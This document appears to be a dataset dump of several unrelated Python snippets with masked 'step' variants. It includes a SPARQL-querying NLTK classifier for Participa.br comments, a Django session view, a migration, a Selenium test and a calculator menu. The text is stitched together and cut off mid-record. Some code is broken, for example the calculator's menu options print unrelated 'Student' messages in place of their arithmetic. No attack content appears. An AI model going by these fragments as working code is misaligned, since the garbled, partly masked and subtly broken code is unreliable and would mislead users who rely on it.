PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
""")
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print("%.2f segundos para consultar a dbpedia"%(time.time()-NOW,))
for result in results["results"]["bindings"]:
print(result["label"]["value"]+", "+result["label"]["xml:lang"])
PREFIX="""PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2="SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}"
NOW=time.time()
sparql3 = SPARQLWrapper("http://localhost:82/participabr/query")
#sparql3 = SPARQLWrapper("http://200.144.255.210:8082/participabr/query")
sparql3.setQuery(PREFIX+q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print("%.2f segundos para puxar todos os nomes dos participantes do Participa.br"%(time.time()-NOW,))
for i in results3["results"]["bindings"][-10:]: print(u"participante: " +i["nome"]["value"])
NOW=time.time()
q="SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}"
sparql3.setQuery(PREFIX+q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print("%.2f segundos para puxar todos os comentários do Participa.br"%(time.time()-NOW,))
NOW=time.time()
print("dados lidos, processando")
import string, nltk as k
# histogram of the words
# (string.join() existed only in Python 2; str.join keeps this runnable on Python 3)
palavras=" ".join([i["texto"]["value"].lower() for i in results4["results"]["bindings"]])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_=palavras.split()
#fdist=k.FreqDist(palavras_)
print("feita primeira freq dist em %.2f"%(time.time()-NOW,))
NOW=time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__=[pp for pp in palavras_ if pp not in stopwords]
fdist_=k.FreqDist(palavras__)
print("feita segunda freq dist (retiradas stopwords) em %.2f"%(time.time()-NOW,))
#NOW=time.time()
#stemmer = k.stem.RSLPStemmer()
#palavras___=[stemmer.stem(pp) for pp in palavras__]
#fdist__=k.FreqDist(palavras___)
#print("feita terceira freq dist (radicalizada) em %.2f"%(time.time()-NOW,))
##################
# pulls comments from the sparql endpoint.
# stores 10 and classifies them by hand
# builds a histogram of all the words
# picks the most frequent words, or with an offset,
# or the least frequent ones
# builds a feature vector with them.
# choosing the 200 most frequent words
# (fdist_.keys()[:200] relied on NLTK 2, where keys() came back sorted by
# frequency; most_common() is the equivalent that also works on NLTK 3)
palavras_escolhidas=[w for w, _ in fdist_.most_common(200)]
# other features we could pick:
# *) number of words ending in a, o, e or s
# *) average length of the words used
# *) use of the stopwords
# (see the illustrative sketch at the end of this file)
# a larger set of hand-made classifications is needed
# to judge which part of the histogram
# is best to consider.
#########
def document_features(documento):
features={}
for palavra in palavras_escolhidas:
features["contains(%s)"%(palavra,)]=(palavra in documento)
return features
# doing it with dummy classes
msgs= [(rr["texto"]["value"],"pos") for rr in results4["results"]["bindings"][:1000]]
msgs2=[(rr["texto"]["value"],"neg") for rr in results4["results"]["bindings"][1000:2000]]
msgs_=msgs+msgs2
random.shuffle(msgs_)
feature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
########
# The most frequent words can be useful, since the comments
# are short and we want the feature vector to carry information
# The least frequent ones are the most unusual words, informative
# for detecting the author's niches
# Those of intermediate incidence are considered the most
# representative of the subject
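#########
# Added sketch (not in the original script): a hypothetical helper implementing
# the alternative features listed above (suffix counts, average word length,
# stopword usage); the name extra_features and the dict keys are illustrative.
def extra_features(documento):
    tokens = documento.lower().split()
    n = max(len(tokens), 1)
    return {
        "n_suffix_aoes": sum(1 for t in tokens if t[-1] in "aoes"),
        "mean_word_len": sum(len(t) for t in tokens) / float(n),
        "n_stopwords": sum(1 for t in tokens if t in stopwords),
    }

# A quick sanity check of the dummy-labelled classifier trained above, using
# nltk's stock helpers (with random dummy labels, accuracy sits near chance):
print("accuracy: %.3f" % k.classify.accuracy(classifier, test_set))
classifier.show_most_informative_features(10)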
|
flexible
|
{
"blob_id": "c5b50420788ddde7483a46c66aca3922ddb47952",
"index": 6199,
"step-1": "<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\n",
"step-2": "<mask token>\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\n<mask token>\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\n<mask token>\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\n<mask token>\nprint('dados lidos, processando')\n<mask token>\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\n<mask token>\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\n<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\nrandom.shuffle(msgs_)\n<mask token>\n",
"step-3": "<mask token>\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\n<mask token>\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n",
"step-4": "from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\nimport string, nltk as k\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n",
"step-5": "#-*- coding: utf-8 -*-\nfrom SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\n\n# testes\nNOW=time.time()\nsparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\nsparql.setQuery(\"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\")\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint(\"%.2f segundos para consultar a dbpedia\"%(time.time()-NOW,))\n\nfor result in results[\"results\"][\"bindings\"]:\n print(result[\"label\"][\"value\"]+\", \"+result[\"label\"][\"xml:lang\"])\n\nPREFIX=\"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\n\nq2=\"SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}\"\nNOW=time.time()\nsparql3 = SPARQLWrapper(\"http://localhost:82/participabr/query\")\n#sparql3 = SPARQLWrapper(\"http://200.144.255.210:8082/participabr/query\")\nsparql3.setQuery(PREFIX+q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os nomes dos participantes do Participa.br\"%(time.time()-NOW,))\n\nfor i in results3[\"results\"][\"bindings\"][-10:]: print(u\"participante: \" +i[\"nome\"][\"value\"])\n\nNOW=time.time()\nq=\"SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}\"\nsparql3.setQuery(PREFIX+q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os comentários do Participa.br\"%(time.time()-NOW,))\n\nNOW=time.time()\nprint(\"dados lidos, processando\")\nimport string, nltk as k\n# histograma com as palavras\npalavras=string.join([i[\"texto\"][\"value\"].lower() for i in results4[\"results\"][\"bindings\"]])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_=palavras.split()\n#fdist=k.FreqDist(palavras_)\nprint(\"feita primeira freq dist em %.2f\"%(time.time()-NOW,))\n\nNOW=time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__=[pp for pp in palavras_ if pp not in stopwords]\nfdist_=k.FreqDist(palavras__)\nprint(\"feita segunda freq dist (retiradas stopwords) em %.2f\"%(time.time()-NOW,))\n\n#NOW=time.time()\n#stemmer = k.stem.RSLPStemmer()\n#palavras___=[stemmer.stem(pp) for pp in palavras__]\n#fdist__=k.FreqDist(palavras___)\n#print(\"feita terceira freq dist (radicalizada) em %.2f\"%(time.time()-NOW,))\n\n##################\n# bebe comentarios do endpoint sparql.\n# guarda 10 e os classifica na mão\n\n# faz histograma de todas as palavras\n# escolhe as mais frequentes ou com offset\n# ou as menos frequentes\n# faz feture vector com elas.\n# escolhendo as 200 palavras mais frequentes\npalavras_escolhidas=fdist_.keys()[:200]\n# outras features que podemos escolher é:\n# *) número de palavras terminadas em a, o, e ou s\n# *) tamanho médio das palavras utilizadas\n# *) uso das stopwords\n\n# é necessário um conjunto maior de classificações na mão\n# para julgar qual parte do histograma\n# é melhor de ser considerada.\n\n#########\ndef 
document_features(documento):\n features={}\n for palavra in palavras_escolhidas:\n features[\"contains(%s)\"%(palavra,)]=(palavra in documento)\n return features\n# fazendo com classes dummy\nmsgs= [(rr[\"texto\"][\"value\"],\"pos\") for rr in results4[\"results\"][\"bindings\"][:1000]]\nmsgs2=[(rr[\"texto\"][\"value\"],\"neg\") for rr in results4[\"results\"][\"bindings\"][1000:2000]]\nmsgs_=msgs+msgs2\nrandom.shuffle(msgs_)\nfeature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n\n########\n# As mais frequentes podem ser úteis já que os comentários\n# são pequenos e queremos que o vetor de atributos tenha informação\n\n# As menos frequentes são as palavras mais incomuns, informativas\n# para detecção de nichos do autor\n\n# As de incidência intermediária são consideradas as mais representativas\n# do assunto\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string
def index(request):
if not "word" in request.session:
request.session["word"] = 'Empty'
if not "count" in request.session:
request.session["count"] = 0
if request.method == "GET":
return render(request, "app_one/index.html")
if request.method == "POST":
request.session['word'] = get_random_string(length=14)
request.session['count'] += 1
return redirect('/')
# def generator(request):
# return redirect('/')
def reset(request):
request.session['count'] = 0
return redirect('/')
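# --- Added sketch (not part of the original views.py): a hypothetical urls.py
# --- wiring the two views above; the route paths are assumptions, not from the
# --- source (the POST branch redirects to '/', so index handles both verbs).
from django.urls import path
from . import views

urlpatterns = [
    path('', views.index),
    path('reset', views.reset),
]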
|
normal
|
{
"blob_id": "2ec5e43860a1d248a2f5cd1abc26676342275425",
"index": 8589,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-3": "<mask token>\n\n\ndef index(request):\n if not 'word' in request.session:\n request.session['word'] = 'Empty'\n if not 'count' in request.session:\n request.session['count'] = 0\n if request.method == 'GET':\n return render(request, 'app_one/index.html')\n if request.method == 'POST':\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.utils.crypto import get_random_string\n\n\ndef index(request):\n if not 'word' in request.session:\n request.session['word'] = 'Empty'\n if not 'count' in request.session:\n request.session['count'] = 0\n if request.method == 'GET':\n return render(request, 'app_one/index.html')\n if request.method == 'POST':\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.utils.crypto import get_random_string\n\n\ndef index(request):\n if not \"word\" in request.session:\n request.session[\"word\"] = 'Empty'\n if not \"count\" in request.session:\n request.session[\"count\"] = 0\n if request.method == \"GET\":\n return render(request, \"app_one/index.html\")\n if request.method == \"POST\":\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n# def generator(request):\n \n# return redirect('/')\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-22 00:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('classroom', '0003_remove_anouncements_classroom'),
]
operations = [
migrations.AddField(
model_name='anouncements',
name='classrm',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),
),
]
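# --- Added sketch (not part of the original migration): the field this migration
# --- adds, as it would read in models.py; assumes a Classroom model already
# --- exists in the classroom app. Illustrative only.
from django.db import models


class Anouncements(models.Model):
    classrm = models.ForeignKey(
        'classroom.Classroom',
        blank=True,
        null=True,
        on_delete=models.CASCADE,
        related_name='anouncements',
    )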
|
normal
|
{
"blob_id": "e9659555938211d067919ee5e0083efb29d42d7b",
"index": 8600,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-05-22 00:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('classroom', '0003_remove_anouncements_classroom'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anouncements',\n name='classrm',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_1|>
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = "btn.btn-lg.btn-primary.btn-add-to-basket"
found_button = WebDriverWait(browser, 5).until(
EC.element_to_be_clickable((By.CLASS_NAME, btn_add))
)
    assert found_button, "The 'add to basket' button was not found"
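# --- Added sketch (not in the original test file): a minimal, assumed conftest.py
# --- providing the `browser` fixture the test expects; Chrome is an arbitrary choice.
import pytest
from selenium import webdriver


@pytest.fixture
def browser():
    driver = webdriver.Chrome()
    yield driver
    driver.quit()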
|
flexible
|
{
"blob_id": "464be943f4fe34dda826ebada9e128f1d7d671ac",
"index": 8485,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-3": "<mask token>\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-4": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-5": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = \"btn.btn-lg.btn-primary.btn-add-to-basket\"\n found_button = WebDriverWait(browser, 5).until(\n EC.element_to_be_clickable((By.CLASS_NAME, btn_add))\n )\n assert found_button != False, 'Do not found the button of add to basket'",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = (a*c)/2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print("CIRCULO: {:.3f}".format(pi*c**2))
print('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))
print("QUADRADO: {:.3f}".format(b**2))
print("RETANGULO: {:.3f}".format(a*b))
|
normal
|
{
"blob_id": "d44d9003e9b86722a0fc1dfe958de462db9cd5f1",
"index": 1670,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('TRIANGULO: {:.3f}'.format(t))\n<mask token>\nprint('CIRCULO: {:.3f}'.format(pi * c ** 2))\nprint('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))\nprint('QUADRADO: {:.3f}'.format(b ** 2))\nprint('RETANGULO: {:.3f}'.format(a * b))\n",
"step-3": "linha = input().split()\na = float(linha[0])\nb = float(linha[1])\nc = float(linha[2])\nt = a * c / 2\nprint('TRIANGULO: {:.3f}'.format(t))\npi = 3.14159\nprint('CIRCULO: {:.3f}'.format(pi * c ** 2))\nprint('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))\nprint('QUADRADO: {:.3f}'.format(b ** 2))\nprint('RETANGULO: {:.3f}'.format(a * b))\n",
"step-4": "linha = input().split()\n\na = float(linha[0])\nb = float(linha[1])\nc = float(linha[2])\n\nt = (a*c)/2\n\nprint('TRIANGULO: {:.3f}'.format(t))\n\npi = 3.14159\n\nprint(\"CIRCULO: {:.3f}\".format(pi*c**2))\n\nprint('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))\n\nprint(\"QUADRADO: {:.3f}\".format(b**2))\n\nprint(\"RETANGULO: {:.3f}\".format(a*b))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def multiplica():
one = int(input('1º: '))
two = int(input('2º: '))
print('a multiplicação é: ', one*two)
def soma():
one = int(input('1º: '))
two = int(input('2º: '))
print('a soma é: ', one+two)
def subtra():
one = int(input('1º: '))
two = int(input('2º: '))
print('a subtração é: ', one-two)
ans=True
while ans:
print ("""
1.Multiplicação
2.Soma
3.Subtração
4.Exit/Quit
""")
ans= int(input("What would you like to do? "))
if ans== 1:
multiplica()
    elif ans== 2:
        soma()
    elif ans== 3:
        subtra()
elif ans== 4:
print("\n Goodbye")
exit()
else:
print("\n Not Valid Choice Try again")
|
flexible
|
{
"blob_id": "414fa4021b21cea0dc49380aebfe67f0204f0574",
"index": 5994,
"step-1": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\n<mask token>\n",
"step-2": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\n<mask token>\n",
"step-3": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\n<mask token>\nwhile ans:\n print(\n \"\"\"\n 1.Multiplicação\n 2.Soma\n 3.Subtração\n 4.Exit/Quit\n \"\"\"\n )\n ans = int(input('What would you like to do? '))\n if ans == 1:\n multiplica()\n elif ans == 2:\n print('\\n Student Deleted')\n elif ans == 3:\n print('\\n Student Record Found')\n elif ans == 4:\n print('\\n Goodbye')\n exit()\n else:\n print('\\n Not Valid Choice Try again')\n",
"step-4": "def multiplica():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a multiplicação é: ', one * two)\n\n\ndef soma():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a soma é: ', one + two)\n\n\ndef subtra():\n one = int(input('1º: '))\n two = int(input('2º: '))\n print('a subtração é: ', one - two)\n\n\nans = True\nwhile ans:\n print(\n \"\"\"\n 1.Multiplicação\n 2.Soma\n 3.Subtração\n 4.Exit/Quit\n \"\"\"\n )\n ans = int(input('What would you like to do? '))\n if ans == 1:\n multiplica()\n elif ans == 2:\n print('\\n Student Deleted')\n elif ans == 3:\n print('\\n Student Record Found')\n elif ans == 4:\n print('\\n Goodbye')\n exit()\n else:\n print('\\n Not Valid Choice Try again')\n",
